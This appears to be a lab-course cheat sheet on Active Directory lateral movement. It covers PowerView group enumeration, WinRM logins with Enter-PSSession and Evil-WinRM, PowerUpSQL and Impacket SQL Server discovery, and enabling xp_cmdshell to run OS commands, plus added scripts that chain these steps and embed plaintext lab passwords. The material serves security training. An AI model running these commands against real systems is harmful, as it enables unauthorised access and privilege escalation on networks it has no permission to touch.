Privileged Access

1. Enumerate Remote Desktop Users Group

Command:

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"
  • Description: PowerView function that lists the members of the local Remote Desktop Users group on ACADEMY-EA-MS01. Membership grants interactive RDP logon to that host without local admin rights, so any non-admin domain users or groups returned here are candidates for lateral movement. Nested groups show up with IsGroup set; resolve them with Get-DomainGroupMember.


2. Enumerate Remote Management Users Group

Command:

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
  • Description: PowerView function that lists the members of the local Remote Management Users group on ACADEMY-EA-MS01. Membership grants WinRM / PowerShell Remoting access (TCP 5985/5986) to the host without local admin rights, which is exactly what the Enter-PSSession and Evil-WinRM steps below rely on.


3. Create a Secure Password Variable

Command:

$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
  • Description: Creates a SecureString variable ($password) holding the password (Klmcargo2) of a user. -AsPlainText -Force is required when converting a literal string; the plaintext still ends up in the shell history and any transcript, so prefer Read-Host -AsSecureString when working interactively.


4. Create a Credential Object

Command:

$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
  • Description: Creates a PSCredential object ($cred) for the domain account INLANEFREIGHT\forend using the SecureString stored in $password. Any cmdlet with a -Credential parameter can consume it.


5. Establish a PowerShell Session

Command:

Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred
  • Description: Uses Enter-PSSession to open an interactive PowerShell Remoting (WinRM) session on ACADEMY-EA-DB01, authenticating with the credential object built earlier ($cred, which wraps $password). This works only if the account is a local administrator or a member of Remote Management Users on the target and WinRM (TCP 5985/5986) is reachable; an access-denied error with WinRM up points to the former, a connection error to the latter.
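Steps 1 to 5 as one script, added here as an illustration and not taken from the page or from PowerView itself. It assumes PowerView is already loaded in the session (for Get-NetLocalGroupMember), that the host list is the two hosts named on the page, and that the output property names (ComputerName, GroupName, MemberName, IsGroup, IsDomain) are PowerView's; the password is prompted for rather than typed as a literal so it stays out of the shell history.

```powershell
# Added example (not from the page or PowerView): enumerate who can RDP / WinRM into
# each target, build a credential, then confirm remoting access where WinRM answers.
# Assumes PowerView is loaded and the hosts below exist (names taken from the page).
$targets = 'ACADEMY-EA-MS01', 'ACADEMY-EA-DB01'
$groups  = 'Remote Desktop Users', 'Remote Management Users'

# Steps 1-2: local group membership on each host. IsGroup = True rows are nested
# groups and need a follow-up Get-DomainGroupMember to expand.
$access = foreach ($t in $targets) {
    foreach ($g in $groups) {
        Get-NetLocalGroupMember -ComputerName $t -GroupName $g -ErrorAction SilentlyContinue |
            Select-Object ComputerName, GroupName, MemberName, IsGroup, IsDomain
    }
}
$access | Format-Table -AutoSize

# Steps 3-4: credential object. Prompting avoids leaving the password in history;
# ConvertTo-SecureString "..." -AsPlainText -Force does the same job in a script.
$password = Read-Host -Prompt 'Password for INLANEFREIGHT\forend' -AsSecureString
$cred     = New-Object System.Management.Automation.PSCredential ('INLANEFREIGHT\forend', $password)

# Step 5: check the WinRM listener first (no credentials needed for the identify request)
# so a failure is attributable to access rights rather than the transport, then run a
# non-interactive probe that reports who we landed as and whether that is a local admin.
foreach ($t in $targets) {
    if (Test-WSMan -ComputerName $t -ErrorAction SilentlyContinue) {
        Invoke-Command -ComputerName $t -Credential $cred -ErrorAction SilentlyContinue -ScriptBlock {
            $id = [Security.Principal.WindowsIdentity]::GetCurrent()
            $pr = New-Object Security.Principal.WindowsPrincipal($id)
            [pscustomobject]@{
                Host       = $env:COMPUTERNAME
                User       = $id.Name
                LocalAdmin = $pr.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
            }
        }
    }
    else {
        Write-Warning "$t : WinRM not reachable on 5985/5986"
    }
}

# Interactive session, exactly as in step 5 of the cheat sheet:
# Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred
```

An access-denied result from Invoke-Command on a host where Test-WSMan succeeded means forend is in neither Remote Management Users nor the local Administrators group there; compare against the $access table before trying other accounts.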


6. Establish a PowerShell Session Using Evil-WinRM

Command:

evil-winrm -i 10.129.201.234 -u forend
  • Description: Opens a WinRM shell on 10.129.201.234 as the user forend from a Linux host. Evil-WinRM prompts for the password when -p is omitted (pass -H for a NTLM hash instead). The same access requirements apply as for Enter-PSSession: the account must be a local administrator or a member of Remote Management Users on the target.


7. Import PowerUpSQL

Command:

Import-Module .\PowerUpSQL.ps1
  • Description: Loads PowerUpSQL into the current PowerShell session. The script must be in the current directory (or given by full path), and the execution policy must permit it (for example, Set-ExecutionPolicy Bypass -Scope Process).


8. Enumerate SQL Server Instances

Command:

Get-SQLInstanceDomain
  • Description: PowerUpSQL function that discovers SQL Server instances by querying the domain for MSSQLSvc service principal names (SPNs). It needs only a domain-joined context, not SQL credentials, and also returns the service account each SPN is registered to, which is useful for identifying instances running as domain accounts.


9. Query SQL Server Version

Command:

Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'
  • Description: PowerUpSQL function that connects to the instance at 172.16.5.150 on TCP port 1433 with the supplied domain credentials and runs SELECT @@version, returning the SQL Server version and patch level. The "host,port" form is used because the instance is addressed by IP rather than by the SPN-derived name.
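Steps 7 to 9 chained into one discovery pass, added here as an illustration (it is not the page's own code nor PowerUpSQL documentation). It uses PowerUpSQL's Get-SQLInstanceDomain, Get-SQLConnectionTestThreaded and Get-SQLServerInfo with the property names those cmdlets emit as I know them (Status, Instance, ServiceAccount, Currentlogin, IsSysadmin, SQLServerVersionNumber); the instance address and credentials are the ones on the page, and everything else is assumed.

```powershell
# Added example (not from the page or PowerUpSQL): find every SQL Server instance the
# domain advertises, keep the ones the current user can actually log in to, and record
# version, service account and whether we already hold sysadmin on each.
Import-Module .\PowerUpSQL.ps1

# Step 8: discovery via MSSQLSvc SPNs. No SQL credentials involved, only LDAP.
$instances = Get-SQLInstanceDomain -Verbose

# Which instances accept a login from the current Windows context? PowerUpSQL reports
# Status = 'Accessible' or 'Not Accessible' per instance.
$reachable = $instances |
    Get-SQLConnectionTestThreaded -Verbose -Threads 10 |
    Where-Object { $_.Status -eq 'Accessible' }

# For each reachable instance, pull what decides the next move: are we sysadmin
# (xp_cmdshell is a straight path), and which account does the service run as?
$summary = foreach ($i in $reachable) {
    $info = Get-SQLServerInfo -Instance $i.Instance
    [pscustomobject]@{
        Instance       = $i.Instance
        Version        = $info.SQLServerVersionNumber
        ServiceAccount = $info.ServiceAccount
        CurrentLogin   = $info.Currentlogin
        IsSysadmin     = $info.IsSysadmin
    }
}
$summary | Format-Table -AutoSize

# Step 9 with explicit domain credentials against one instance by IP and port, extended
# to return the login name and sysadmin flag alongside the version in a single query.
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" `
    -Username "inlanefreight\damundsen" -Password "SQL1234!" `
    -Query "SELECT @@version AS version, SYSTEM_USER AS login, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin"
```

Instances that are 'Not Accessible' for the current user are still worth listing: the service account names from Get-SQLInstanceDomain tell you which ones run as domain accounts and are therefore Kerberoastable, independent of SQL access.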


10. Display mssqlclient.py Options

Command:

mssqlclient.py
  • Description: Running Impacket's mssqlclient.py with no arguments prints its usage and options (target format, -windows-auth, -hashes, -port, -db) from a Linux host.


11. Connect to MSSQL Server

Command:

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
  • Description: Impacket's mssqlclient.py connecting to the MSSQL server at 172.16.5.150 from a Linux host as INLANEFREIGHT/DAMUNDSEN. -windows-auth selects Windows (NTLM) authentication instead of a SQL login; the password is prompted for when it is not supplied after the username, and a successful connection lands in an interactive SQL> prompt.


12. Display SQL Client Options

Command:

SQL> help
  • Description: Lists the client-side helper commands mssqlclient.py provides once connected (enable_xp_cmdshell, disable_xp_cmdshell, xp_cmdshell, sp_start_job, enum_db, enum_logins, enum_impersonate and others) in addition to raw T-SQL.


13. Enable xp_cmdshell

Command:

SQL> enable_xp_cmdshell
  • Description: Built-in mssqlclient.py helper that turns on the xp_cmdshell extended stored procedure by running sp_configure for 'show advanced options' and then 'xp_cmdshell', each followed by RECONFIGURE. This requires sysadmin rights on the instance; once enabled, OS commands run as the SQL Server service account, and the change is visible to defenders in sys.configurations and in the SQL error log.


14. Enumerate System Rights

Command:

xp_cmdshell whoami /priv
  • Description: mssqlclient.py helper that runs whoami /priv through xp_cmdshell, listing the privileges held by the SQL Server service account on the host. SeImpersonatePrivilege in that output is the usual starting point for escalating from the service account to SYSTEM.
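Steps 13 and 14 reproduced from the Windows side, added here as an illustration (not the page's code and not part of Impacket or PowerUpSQL). It sends the same T-SQL that mssqlclient.py's enable_xp_cmdshell issues, but through PowerUpSQL's Get-SQLQuery, and adds the two checks a practitioner wants first: that the login is actually sysadmin, and whether xp_cmdshell is already on so the configuration is not touched needlessly. Instance and credentials are the page's; the splatting hash and column names (is_sysadmin, value_in_use, output) are assumptions.

```powershell
# Added example (not from the page): enable xp_cmdshell only when needed, then run
# whoami /priv and flag SeImpersonatePrivilege. Assumes PowerUpSQL.ps1 is in the
# current directory; instance and credentials are the ones on the cheat sheet.
Import-Module .\PowerUpSQL.ps1

$sqlArgs = @{
    Instance = "172.16.5.150,1433"
    Username = "inlanefreight\damundsen"
    Password = "SQL1234!"
}

# sp_configure needs sysadmin (strictly, ALTER SETTINGS); fail early rather than
# leave a half-applied configuration change in the logs.
$role = Get-SQLQuery @sqlArgs -Query "SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin"
if ($role.is_sysadmin -ne 1) { throw "Login is not sysadmin; cannot enable xp_cmdshell." }

# Current state from sys.configurations (value_in_use = 1 means enabled).
$state = Get-SQLQuery @sqlArgs -Query "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'"
if ($state.value_in_use -ne 1) {
    # The same two sp_configure calls mssqlclient.py's enable_xp_cmdshell runs.
    Get-SQLQuery @sqlArgs -Query @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
"@
}

# Step 14: the command runs as the SQL Server service account. xp_cmdshell returns one
# row per output line plus a trailing NULL row, which the type filter drops.
$priv = Get-SQLQuery @sqlArgs -Query "EXEC xp_cmdshell 'whoami /priv'" |
    Select-Object -ExpandProperty output |
    Where-Object { $_ -is [string] }
$priv

if ($priv | Where-Object { $_ -match 'SeImpersonatePrivilege' }) {
    Write-Host "SeImpersonatePrivilege is held by the service account."
}
```

If xp_cmdshell was off before you started, turn it back off afterwards with the matching sp_configure 'xp_cmdshell', 0 call (mssqlclient.py exposes this as disable_xp_cmdshell); leaving it enabled is a noisy and persistent change to the target.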
